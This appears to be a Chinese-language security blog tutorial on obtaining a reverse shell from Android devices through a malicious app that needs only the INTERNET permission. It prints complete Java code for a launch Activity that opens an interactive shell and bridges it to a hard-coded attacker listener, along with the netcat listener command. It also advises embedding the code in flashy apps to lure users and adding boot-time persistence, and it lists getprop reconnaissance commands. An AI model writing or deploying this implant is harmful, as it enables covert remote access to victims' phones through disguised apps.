【移动安全】安卓设备远程操控提权

最近逛博客的时候看到一篇关于安卓设备反弹 shell 的文章,刚好来研究一下这项技术。文章思路是让受害者在设备上安装一个含有恶意代码的 app,由这个 app 发起 reverse shell。看到这里我有点疑惑:用户会给恶意 app 授权吗?后来了解到,恶意 app 只需要声明 `<uses-permission android:name="android.permission.INTERNET"/>` 这一个 normal 级别的权限就能建立 reverse shell——normal 权限在安装时自动授予,不会弹出运行时授权提示,因此不需要用户额外授权。至于让用户安装 app,本身并不难:恶意代码可以嵌入各种华丽花哨的 app 中诱骗用户下载。需要注意的是,这样得到的 shell 以该 app 自己的 UID 运行,受应用沙箱和 SELinux(untrusted_app 域)限制,能访问的资源与一个普通 app 相同。

Android 框架中定义为 normal 级别的权限还有下面这些(摘自框架 AndroidManifest.xml 的 `<permission>` 声明,已省略 `android:protectionLevel` 属性;app 在自己的清单中通过 `<uses-permission>` 请求它们,具体列表随 Android 版本略有差异):

<!-- Allows an app to use fingerprint hardware.-->

    <permission android:name="android.permission.USE_FINGERPRINT">

                <!-- Allows an application to broadcast an Intent to set an alarm for the user.-->

    <permission android:name="com.android.alarm.permission.SET_ALARM">

               <!-- Allows an application to access extra location provider commands -->

    <permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS">

                <!-- Allows applications to open network sockets. -->

    <permission android:name="android.permission.INTERNET">

                <!-- Allows applications to access information about networks -->

    <permission android:name="android.permission.ACCESS_NETWORK_STATE">

                 <!-- Allows applications to access information about Wi-Fi networks. -->

    <permission android:name="android.permission.ACCESS_WIFI_STATE">

               <!-- Allows applications to change Wi-Fi connectivity state. -->

    <permission android:name="android.permission.CHANGE_WIFI_STATE">

                <!-- Allows applications to connect to paired bluetooth devices. -->

    <permission android:name="android.permission.BLUETOOTH">

                <!-- Allows applications to discover and pair bluetooth devices. -->

    <permission android:name="android.permission.BLUETOOTH_ADMIN">

                 <!-- Allows applications to perform I/O operations over NFC. -->

    <permission android:name="android.permission.NFC">

               <!-- Allows access to the list of accounts in the Accounts Service.
                    NOTE: GET_ACCOUNTS is declared with protection level "dangerous"
                    (runtime permission), not "normal"; it does not belong in this list. -->

    <permission android:name="android.permission.GET_ACCOUNTS">

                <!-- Allows applications to enter Wi-Fi Multicast mode. -->

    <permission android:name="android.permission.CHANGE_WIFI_MULTICAST_STATE">

                 <!-- Allows access to the vibrator. -->

    <permission android:name="android.permission.VIBRATE">

                <!-- Allows access to the flashlight. -->

    <permission android:name="android.permission.FLASHLIGHT">

                <!-- Allows using PowerManager WakeLocks to keep processor from sleeping or screen

         from dimming. -->

    <permission android:name="android.permission.WAKE_LOCK">

                <!-- Allows using the device's IR transmitter, if available. -->

    <permission android:name="android.permission.TRANSMIT_IR">

               <!-- Allows an application to modify global audio settings. -->

    <permission android:name="android.permission.MODIFY_AUDIO_SETTINGS">

                <!-- Allows applications to disable the keyguard if it is not secure. -->

    <permission android:name="android.permission.DISABLE_KEYGUARD">

               <!-- Allows an application to change the Z-order of tasks. -->

    <permission android:name="android.permission.REORDER_TASKS">

               <!-- Allows an application to call

        {@link android.app.ActivityManager#killBackgroundProcesses}. -->

    <permission android:name="android.permission.KILL_BACKGROUND_PROCESSES">

               <!-- Allows applications to set the wallpaper. -->

    <permission android:name="android.permission.SET_WALLPAPER">

                 <!-- Allows applications to set the wallpaper hints. -->

    <permission android:name="android.permission.SET_WALLPAPER_HINTS">

                <!-- Allows applications to set the system time zone. -->

    <permission android:name="android.permission.SET_TIME_ZONE">

                <!-- Allows an application to install a shortcut in Launcher. -->

    <permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT">

                <!-- Allows applications to read the sync settings. -->

    <permission android:name="android.permission.READ_SYNC_SETTINGS">

                <!-- Allows applications to read the sync stats. -->

    <permission android:name="android.permission.READ_SYNC_STATS">

               <!-- Allows an application to find out the space used by any package. -->

    <permission android:name="android.permission.GET_PACKAGE_SIZE">

                <!-- Allows an application to receive the

         {@link android.content.Intent#ACTION_BOOT_COMPLETED} that is

         broadcast after the system finishes booting.  If you don't

         request this permission, you will not receive the broadcast at

         that time.  Though holding this permission does not have any

         security implications, it can have a negative impact on the

         user experience by increasing the amount of time it takes the

         system to start and allowing applications to have themselves

         running without the user being aware of them.  As such, you must

         explicitly declare your use of this facility to make that visible

         to the user. -->

    <permission android:name="android.permission.RECEIVE_BOOT_COMPLETED">

                <!-- Allows an application to broadcast sticky intents.  These are

         broadcasts whose data is held by the system after being finished,

         so that clients can quickly retrieve that data without having

         to wait for the next broadcast. -->

    <permission android:name="android.permission.BROADCAST_STICKY">

                <!-- Allows applications to change network connectivity state. -->

    <permission android:name="android.permission.CHANGE_NETWORK_STATE">

               <!-- Allows an application to request installing packages. Apps

         targeting APIs greater than 22 must hold this permission in

         order to use {@link android.content.Intent#ACTION_INSTALL_PACKAGE}. -->

    <permission android:name="android.permission.REQUEST_INSTALL_PACKAGES">

               <!-- Marker permission for applications that wish to access notification policy. -->

    <permission android:name="android.permission.ACCESS_NOTIFICATION_POLICY">

 

首先,这段恶意代码(放在 app 的启动 Activity 中,app 一打开就执行)是这样的:

package com.example.myapplication;

import androidx.appcompat.app.AppCompatActivity;

import android.os.Bundle;

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class MainActivity extends AppCompatActivity {

    /**
     * Launch activity of the proof-of-concept app.  On creation it starts a
     * background thread that spawns an interactive shell and bridges the
     * shell's stdin/stdout/stderr to a plain TCP connection back to a
     * hard-coded listener (192.168.221.94:4444).  The only manifest
     * permission this needs is INTERNET (protection level "normal"), so no
     * runtime permission prompt is shown to the user.
     *
     * Security notes for the reader:
     *  - The shell runs as this app's own UID inside the app sandbox; it gives
     *    the remote side no more access than the app itself has.
     *  - The channel is unencrypted and unauthenticated TCP, so anyone on the
     *    network path can read or take over the session.
     *  - The listener address is a compile-time constant and there is no
     *    reconnect logic: once the socket drops, the session is gone.
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // All network I/O happens on a worker thread; opening a Socket on the
        // UI thread would fail with NetworkOnMainThreadException.
        Runnable runnable = new Runnable() {
            @Override
            public void run() {
                try {
                    // NOTE(review): /bin/sh is not guaranteed to exist on Android --
                    // the shell lives at /system/bin/sh and /bin is, at best, a
                    // symlink on newer releases.  Verify on the target device.
                    String[] cmd = {"/bin/sh", "-i"};
                    Process proc = Runtime.getRuntime().exec(cmd);
                    // proc_in  = shell stdout, proc_out = shell stdin, proc_err = shell stderr
                    InputStream proc_in = proc.getInputStream();
                    OutputStream proc_out = proc.getOutputStream();
                    InputStream proc_err = proc.getErrorStream();

                    // Outbound connection to the attacker's listener (nc -nvlp 4444).
                    Socket socket = new Socket("192.168.221.94", 4444);
                    InputStream socket_in = socket.getInputStream();
                    OutputStream socket_out = socket.getOutputStream();

                    // Busy-polling bridge: copy shell stdout/stderr to the socket
                    // and socket input to the shell, one byte at a time.  Because
                    // available() never blocks, this loop spins at full CPU while
                    // idle and never terminates; the socket and the shell process
                    // are never closed explicitly.
                    while (true) {
                        while (proc_in.available() > 0) socket_out.write(proc_in.read());
                        while (proc_err.available() > 0) socket_out.write(proc_err.read());
                        while (socket_in.available() > 0) proc_out.write(socket_in.read());
                        socket_out.flush();
                        proc_out.flush();
                    }
                } catch (IOException e) {
                    // Unreachable listener, missing shell binary, or a reset
                    // socket all end up here; the error only goes to logcat and
                    // the worker thread exits silently.
                    e.printStackTrace();
                } catch (StringIndexOutOfBoundsException e) {
                    // Nothing in the try block can throw this; the catch is dead code.
                    e.printStackTrace();
                }
            }
        };

        new Thread(runnable).start();
    }
}

一旦 app 被打开(MainActivity 的 onCreate 执行),攻击者就会在监听端拿到一个 shell。需要说明的是,这个 shell 以该 app 的 UID 在应用沙箱中运行,并不等于"手机的控制权";只有当设备已经 root 且 root 管理工具放行时,在 shell 中输入 su 才能提升到 root。为了让它持久化——即每次设备重启、网络连接变化或用户解锁屏幕时都重新连回我们的监听器——需要在 AndroidManifest 中为 BroadcastReceiver 声明相应的 intent-filter(例如 BOOT_COMPLETED,这还需要申请 RECEIVE_BOOT_COMPLETED 权限),或者在运行时动态注册广播接收器,在对应事件触发时执行上述代码并连接监听器。注意 Android 7.0/8.0 起对清单注册的隐式广播和后台执行有限制,部分广播(如 CONNECTIVITY_ACTION)不再投递给清单注册的接收器,只能动态注册接收。

nc -nvlp 4444

由于这个 shell 只拥有该 app 自身的权限(受应用沙箱与 SELinux 限制),在没有 root 的情况下能获取的信息很少,主要是不需要额外权限就能读取的公开信息,例如系统属性。

获取设备的基本信息:getprop(下面命令中的 `adb shell` 前缀只在通过 ADB 连接时需要;在反弹 shell 里直接执行 `getprop ...` 即可)

 

获取制造商:adb shell getprop ro.product.manufacturer
获取型号:adb shell getprop ro.product.model
获取品牌:adb shell getprop ro.product.brand
获取产品名:adb shell getprop ro.product.name
获取操作系统版本:adb shell getprop ro.build.version.release
获取 SDK 版本:adb shell getprop ro.build.version.sdk

 
